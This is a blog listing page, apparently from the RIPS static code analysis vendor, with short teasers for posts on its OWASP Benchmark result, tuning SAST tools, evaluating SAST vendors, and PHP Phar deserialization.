RIPS Scores a Perfect 100% at OWASP Benchmark

21 min read 10 Mar 2020 by Malte Skoruppa
The OWASP Benchmark suite aims at measuring the quality of vulnerability detection tools by exposing both actual and false vulnerabilities within hundreds of test cases. Our SAST solution RIPS is able to achieve 100% true positives at 0% false positives for this suite—something no other SAST solution has achieved so far. In this blog post, we publish our results and discuss the pros and cons of popular benchmark suites.

How to Fine-Tune Static Code Analysis - Part 2

12 min read 17 Dec 2019 by Johannes Dahse
Static code analysis is a powerful tool for automated security testing of applications. The more an analysis is tailored to your programming language and individual code, the more efficient and accurate are the results. In the second part of our fine-tuning guide, we dive deeper into our analysis approach and how to fully customize it with 5 advanced settings.

How to Fine-Tune Static Code Analysis - Part 1

10 min read 10 Dec 2019 by Johannes Dahse
A good SAST solution works out-of-the-box for any code base. But there are configurations that help to squeeze the most out of your code analysis. These configurations depend on the logic and environment of your application, as well as on your personal expectations of the scan results. In this blog post, we look at 5 basic options to fine-tune static analysis to your needs.

5 Best Practices for your SAST Evaluation

11 min read 26 Feb 2019 by Johannes Dahse
Choosing the right solution for automated security testing is hard. A good way is to run a proof of concept (POC) of different vendors so you can verify marketing claims before adding another software to your stack. Our best practices can help to prepare an efficient and thorough evaluation so you can unmask snake oil from cutting-edge technology and make the best choice.

What is Phar Deserialization

5 min read 14 Aug 2018 by Johannes Dahse
Last week a new exploitation technique for PHP applications was announced at the BlackHat USA conference. Find out everything you need to know in this blog post.